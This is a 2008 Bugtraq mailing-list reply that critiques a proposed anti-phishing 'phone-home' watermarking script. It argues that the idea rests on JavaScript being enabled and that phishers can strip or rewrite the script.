Re: Anti-Phishing with digital watermarking

[Ansgar Wiechers <bugtraq () planetcobalt net>]

On 2008-09-29 Razi Shaban wrote:
> > - Alerts based on client-side scripting won't work when scripting is
> >   disabled in the browser, which is the more secure setting to begin
> >   with. So, to enable this kind of alert, you'd have to lower the
> >   overall security of the browser.
>
> People who have enough tech knowledge to disable scripting are not the
> target audience of phishing. Those are the people least likely to fall
> for it. It is rather the people who don't know what a "script" is that
> are going to be susceptible.

Disabling JavaScript doesn't take any kind of technical knowledge. And
especially the people who don't know what a script is should disable
client-side scripting entirely rather than rely on JavaScript to tell
them whether they're secure or not.

> > - With client-side scripting enabled, phishers can most easily use the
> >   very same technology to rewrite those parts of the included original
> >   page they don't like.
>
> I'm not even sure what this means,

I suspected as much.

> but this watermarking (for lack of a better term) can be removed. All
> watermarking can be removed. However, this watermarking is not meant
> to show up on the user's screen, but rather to make the original
> author aware of the phishing attempts.

Same difference. It doesn't matter whether the script raises a popup on
the user's desktop or sends a message back to the company. The phisher
can use both client- and server-side scripting to rewrite those parts of
the original page he doesn't like.

> > - Even with client-side scripting disabled, phishers can still use
> >   server-side scripting to rewrite those parts of the original page
> >   they don't like, because they're acting as a man-in-the-middle.
>
> If the phisher is not aware of or cannot find the exact code
> responsible for the phone-home reaction, they can't remove it.

Underestimating an enemy sounds kinda risky to me. What makes you
believe your little phone-home is so hard to detect for the bad guys?

> A general response to your ideas on disabling client side scripting is
> easily refuted by the idea of scale. Phishing does not target one, it
> targets many. If one user ? hell, seventy ? have all the protection
> afforded by modern technology, the phone-home reaction will still take
> place. Why? Because any phishing worth mentioning is viewed thousands
> of times, and at least one of the users being targeted will be running
> IE5 with absolutely no security. The goal of this is, again, to make
> the original author aware of the phishing, not to prevent it
> altogether.

Which, of course, is totally unreliable (and thus utterly pointless as a
security measure), because you make way too much assumptions (client has
JavaScript enabled, phisher doesn't check the used website for phone-
home code, phisher uses the original website in the first place, ...).

Regards
Ansgar Wiechers
-- 
"The Mac OS X kernel should never panic because, when it does, it
seriously inconveniences the user."
--http://developer.apple.com/technotes/tn2004/tn2118.html